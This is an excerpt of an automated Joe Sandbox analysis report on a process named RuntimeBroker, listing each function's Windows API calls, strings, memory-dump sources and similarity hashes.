GetLastError.KERNEL32(?,?,?,00007FFE0C0B6A6B,?,?,00000000,00007FFE0C0B689C,?,?,?,?,00007FFE0C0B65E5), ref: 00007FFE0C0B693F
wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE0C0B6A6B,?,?,00000000,00007FFE0C0B689C,?,?,?,?,00007FFE0C0B65E5), ref: 00007FFE0C0B6958
LoadLibraryExW.KERNEL32(?,?,?,00007FFE0C0B6A6B,?,?,00000000,00007FFE0C0B689C,?,?,?,?,00007FFE0C0B65E5), ref: 00007FFE0C0B696A
FreeLibrary.KERNEL32(?,?,?,00007FFE0C0B6A6B,?,?,00000000,00007FFE0C0B689C,?,?,?,?,00007FFE0C0B65E5), ref: 00007FFE0C0B69B0
GetProcAddress.KERNEL32(?,?,?,00007FFE0C0B6A6B,?,?,00000000,00007FFE0C0B689C,?,?,?,?,00007FFE0C0B65E5), ref: 00007FFE0C0B69BC

Strings

api-ms-, xrefs: 00007FFE0C0B6951

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
String ID: api-ms-
API String ID: 916704608-2084034818
Opcode ID: 45bb9c456b18d615664943834e4003b355ea3ec7f5874fc1f64106649d67ca5c
Instruction ID: 72f70a8a7a6636275a9b23daeeda2728b5cd4027277bbcbee467418ad79460ff
Opcode Fuzzy Hash: 45bb9c456b18d615664943834e4003b355ea3ec7f5874fc1f64106649d67ca5c
Instruction Fuzzy Hash: 2B31D831B5A74291EF15DB0AA8202B96399BF04BA0F194535EE2D073B5EF3DE544C348

Function 00007FFE0C0B27CC Relevance: 12.1, APIs: 8, Instructions: 148COMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B2886
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B28A5
__AdjustPointer.LIBCMT ref: 00007FFE0C0B28E6
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B28F3
__AdjustPointer.LIBCMT ref: 00007FFE0C0B292F
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B2944
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B2989
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B2990

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: abort$AdjustPointer
String ID:
API String ID: 1501936508-0
Opcode ID: ad7bbbe6b4c289a22ae1e43e79ef4439cf3ee9b14764b2eff01f06dd25f3f236
Instruction ID: 131cb8b24acaf85725b8bd7c8d698878c6b6394e9ddbd07c041d8abb08ae6094
Opcode Fuzzy Hash: ad7bbbe6b4c289a22ae1e43e79ef4439cf3ee9b14764b2eff01f06dd25f3f236
Instruction Fuzzy Hash: 1A518E31E8AA4381EA69DB5D946463C67A7AF45FC0F098439DF4D0A7A5DF2CE442C308

Function 00007FFE0C0B25E8 Relevance: 12.1, APIs: 8, Instructions: 148COMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B26A0
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B26BE
__AdjustPointer.LIBCMT ref: 00007FFE0C0B26FF
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B270C
__AdjustPointer.LIBCMT ref: 00007FFE0C0B2748
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B275D
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B27A2
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B27A9

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: abort$AdjustPointer
String ID:
API String ID: 1501936508-0
Opcode ID: d386002f74db6febb42ef9b4bac4e43e25a554ab645870d9c47f674d5a84533b
Instruction ID: 36782dea1efc9f762d9f2388eb3e0e03b1d0b2f4ecb6dc1c1b96d71f32f7b33a
Opcode Fuzzy Hash: d386002f74db6febb42ef9b4bac4e43e25a554ab645870d9c47f674d5a84533b
Instruction Fuzzy Hash: 5F519D31ACAA4381EA66DB1D95A463C63A7AF54F84F058435CF4E067B6DF2CE942C30C

Function 00007FFE0C0B5520 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 132COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FFE0C0B55E9
_local_unwind.LIBVCRUNTIME ref: 00007FFE0C0B568C

Strings

csm, xrefs: 00007FFE0C0B56D0
MOC, xrefs: 00007FFE0C0B5562
csm, xrefs: 00007FFE0C0B5584
RCC, xrefs: 00007FFE0C0B556E

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: FileHeader_local_unwind
String ID: MOC$RCC$csm$csm
API String ID: 2627209546-1441736206
Opcode ID: 385ada566cdd30ad99b7ac5e1d5c8025a7264eea7c22efa234297d7bd0e399d8
Instruction ID: 8c5b04e6970523ec1f2c07a43ddba52a51408a9b5d935cbb4ae2839e7f8c2ba2
Opcode Fuzzy Hash: 385ada566cdd30ad99b7ac5e1d5c8025a7264eea7c22efa234297d7bd0e399d8
Instruction Fuzzy Hash: E4518B76E8961286EB60DF2D986137D66A6FF84B94F140072EB4C533A5DF3CE481CB09

Function 00007FFE0C0BD740 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE0C0BCE14), ref: 00007FFE0C0BD803
DName::DName.LIBVCRUNTIME ref: 00007FFE0C0BD822

Strings

`template-parameter, xrefs: 00007FFE0C0BD830
void, xrefs: 00007FFE0C0BD786

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: NameName::atol
String ID: `template-parameter$void
API String ID: 2130343216-4057429177
Opcode ID: 2821a58495c29764098872c6b010649cccddcb6c42941e500fb92a9452cac6b1
Instruction ID: 5ef338db981301da02af28bb0517bffe851abe3b203adc443527a9c31f2f0f71
Opcode Fuzzy Hash: 2821a58495c29764098872c6b010649cccddcb6c42941e500fb92a9452cac6b1
Instruction Fuzzy Hash: 04411862F88B5688FB10DBA9D8A12FC63B2BF48B84F941135DE0D16A69DF7CE505C344

Function 00007FF72B05CFE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF72B05D29A,?,?,?,00007FF72B05CF8C,?,?,?,00007FF72B05CB89), ref: 00007FF72B05D06D
GetLastError.KERNEL32(?,?,?,00007FF72B05D29A,?,?,?,00007FF72B05CF8C,?,?,?,00007FF72B05CB89), ref: 00007FF72B05D07B
LoadLibraryExW.KERNEL32(?,?,?,00007FF72B05D29A,?,?,?,00007FF72B05CF8C,?,?,?,00007FF72B05CB89), ref: 00007FF72B05D0A5
FreeLibrary.KERNEL32(?,?,?,00007FF72B05D29A,?,?,?,00007FF72B05CF8C,?,?,?,00007FF72B05CB89), ref: 00007FF72B05D113
GetProcAddress.KERNEL32(?,?,?,00007FF72B05D29A,?,?,?,00007FF72B05CF8C,?,?,?,00007FF72B05CB89), ref: 00007FF72B05D11F

Strings

api-ms-, xrefs: 00007FF72B05D08D

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction ID: df023e2298bdeeb8481cb12f4e837c6c823218dad9533ba20b80511e0983d0da
Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction Fuzzy Hash: 2E31932161A646D1EE33BB5AAC54B79A394FF04B60FD91636DD1D07B60EE3CE4428B30

Function 00007FFE0C0B8624 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B86DB

Strings

void, xrefs: 00007FFE0C0B8759
,<ellipsis>, xrefs: 00007FFE0C0B86B8
..., xrefs: 00007FFE0C0B8724
<ellipsis>, xrefs: 00007FFE0C0B8734
,..., xrefs: 00007FFE0C0B86A8

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: Name::operator+
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 2943138195-2211150622
Opcode ID: 16d5b7056506ac1aa3be62c87a897449e0af35361c1a5b370ad614f7e7c3f2e7
Instruction ID: c37ed0d0b8a35bcf75f59a8506a6b90ef57c473748e3fc62884b759a3b0835e9
Opcode Fuzzy Hash: 16d5b7056506ac1aa3be62c87a897449e0af35361c1a5b370ad614f7e7c3f2e7
Instruction Fuzzy Hash: 02413A72A98B4698FB11CB2CD8901AC37AABF08708F548235EB4D127B4DF3CD545C758

Function 00007FFE0C0BA31C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BA40F

Strings

unsigned , xrefs: 00007FFE0C0BA3E3
short , xrefs: 00007FFE0C0BA39C
char , xrefs: 00007FFE0C0BA3A5
long , xrefs: 00007FFE0C0BA37E
int , xrefs: 00007FFE0C0BA38D

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: Name::operator+
String ID: char $int $long $short $unsigned
API String ID: 2943138195-3894466517
Opcode ID: 1a667bf595c3f0eddcec5e75b1b20bf055c895b242c78c01af1086ecda962d52
Instruction ID: 4f0223a6f7ded88ed40b1865c3701de4ad251f5de733f901ae35290b07402101
Opcode Fuzzy Hash: 1a667bf595c3f0eddcec5e75b1b20bf055c895b242c78c01af1086ecda962d52
Instruction Fuzzy Hash: D8416572F9C65289EB11CF6CD8A41BC37A2BF08B04F448031EA4C12B68DF3CA544D718

Function 00007FF72B057B50 Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF72B057B70
OpenProcessToken.ADVAPI32 ref: 00007FF72B057B83
GetTokenInformation.ADVAPI32 ref: 00007FF72B057BA8
GetLastError.KERNEL32 ref: 00007FF72B057BB2
GetTokenInformation.ADVAPI32 ref: 00007FF72B057BF2
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF72B057C0E
CloseHandle.KERNEL32 ref: 00007FF72B057C26

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 8356e17e6427c03366acad688ef96df5430cd8c67dfe58d52091e88c81740b7d
Instruction ID: c9caa850fbb6db86d4d85963d6896311a1b9c58241e0d985abbae8873a59b300
Opcode Fuzzy Hash: 8356e17e6427c03366acad688ef96df5430cd8c67dfe58d52091e88c81740b7d
Instruction Fuzzy Hash: 77215331A0CA4242EB31AB59A89423AE7A1FF857E4F900235DA6D43AF5DF7CE4449B10

Function 00007FF72B06A460 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF72B06A46F
FlsGetValue.KERNEL32 ref: 00007FF72B06A484
FlsSetValue.KERNEL32 ref: 00007FF72B06A4A5
FlsSetValue.KERNEL32 ref: 00007FF72B06A4D2
FlsSetValue.KERNEL32 ref: 00007FF72B06A4E3
FlsSetValue.KERNEL32 ref: 00007FF72B06A4F4
SetLastError.KERNEL32 ref: 00007FF72B06A50F

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
Instruction ID: cb6f89516d80d5f9613f13bc08ebc82a260d38583f06ac38178ceab5761d2cf3
Opcode Fuzzy Hash: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
Instruction Fuzzy Hash: 16210E20B0825242FA7B732E5D99179E182DF8C7B0F944638D93E06AF6DD2CE4414E21

Function 00007FF72B0529E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF72B05342E,?,00007FF72B053534), ref: 00007FF72B052A14
FormatMessageW.KERNEL32(?,?,?,00007FF72B05342E), ref: 00007FF72B052A7D
MessageBoxW.USER32 ref: 00007FF72B052ACF

Strings

Error, xrefs: 00007FF72B052ABE
%ls%ls: %ls, xrefs: 00007FF72B052A96
<FormatMessageW failed.>, xrefs: 00007FF72B052A83

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Message$ErrorFormatLast
String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
API String ID: 3971115935-1149178304
Opcode ID: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
Instruction ID: 4e961df43b03e01fffc5692f8d0dcd4e38debf4df37a838c4ccefed7076a9077
Opcode Fuzzy Hash: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
Instruction Fuzzy Hash: 9D212372618A8582E731AB14F8546EAF364FB88784F804136EBCD53AA8DF7CD545CF50

Function 00007FF72B07707C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF72B0770AD
GetLastError.KERNEL32 ref: 00007FF72B0770B9
CloseHandle.KERNEL32 ref: 00007FF72B0770D1
CreateFileW.KERNEL32 ref: 00007FF72B0770FC
WriteConsoleW.KERNEL32 ref: 00007FF72B07711B

Strings

CONOUT$, xrefs: 00007FF72B0770DD

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction ID: 48a4d459991f99ea64e03fd754b3860bcf394cf5b6e836a4b0acdd0f1642a9d2
Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction Fuzzy Hash: B5118431B18A4186E7619B5AEC54335E3A0FB58BE4F804234DA1D477B4DF3CE504CB50

Function 00007FF72B0581F0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B05821D
K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B05827A

Part of subcall function 00007FF72B0586B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B053FA4,00000000,00007FF72B051925), ref: 00007FF72B0586E9

K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B058305
K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B058364
FreeLibrary.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B058375
FreeLibrary.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B05838A

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: c116373e2a09e68fc95a37a35a910f387ed59b49a7d0ab4690c2b7d3ff367989
Instruction ID: cac5786549ca903f74ed64aa25f920d8e82d03e6fc1201d8e18ba49ae5b43b79
Opcode Fuzzy Hash: c116373e2a09e68fc95a37a35a910f387ed59b49a7d0ab4690c2b7d3ff367989
Instruction Fuzzy Hash: 3A41B372A1978641EB31AF19A8802BAB394FF84B84F844035DF9C57BA9DE3CE401CF14

Function 00007FFE0C0B62D0 Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON

Download Yara Rule

APIs

__unDName.LIBVCRUNTIME ref: 00007FFE0C0B6326
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE0C0B6369
strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE0C0B6393
InterlockedPushEntrySList.KERNEL32 ref: 00007FFE0C0B63B0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE0C0B63BC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE0C0B63C5

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
String ID:
API String ID: 3741236498-0
Opcode ID: 6447550c70440ae48e9dc09acfbe7fa3055870e3a5d625089a78ddc05dba8847
Instruction ID: 964d72f39db285a3e6ba7d1009f18e3c23f005f8daa4c1e0e9f450d702625ebd
Opcode Fuzzy Hash: 6447550c70440ae48e9dc09acfbe7fa3055870e3a5d625089a78ddc05dba8847
Instruction Fuzzy Hash: C831D322B59B5190EB19CF2AA85456933A1FF09FD4B594635EF2D033A0EF3ED452C304

Function 00007FF72B058400 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72B057B50: GetCurrentProcess.KERNEL32 ref: 00007FF72B057B70
Part of subcall function 00007FF72B057B50: OpenProcessToken.ADVAPI32 ref: 00007FF72B057B83
Part of subcall function 00007FF72B057B50: GetTokenInformation.ADVAPI32 ref: 00007FF72B057BA8
Part of subcall function 00007FF72B057B50: GetLastError.KERNEL32 ref: 00007FF72B057BB2
Part of subcall function 00007FF72B057B50: GetTokenInformation.ADVAPI32 ref: 00007FF72B057BF2
Part of subcall function 00007FF72B057B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF72B057C0E
Part of subcall function 00007FF72B057B50: CloseHandle.KERNEL32 ref: 00007FF72B057C26

LocalFree.KERNEL32(?,00007FF72B053814), ref: 00007FF72B05848C
LocalFree.KERNEL32(?,00007FF72B053814), ref: 00007FF72B058495

Strings

D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF72B058462
D:(A;;FA;;;%s), xrefs: 00007FF72B058477
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF72B0584A3
S-1-3-4, xrefs: 00007FF72B058441

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
Instruction ID: ba575d771b70e856a571d81c72c269d89e6245f365fd0fd7f31ccbc91f0e098f
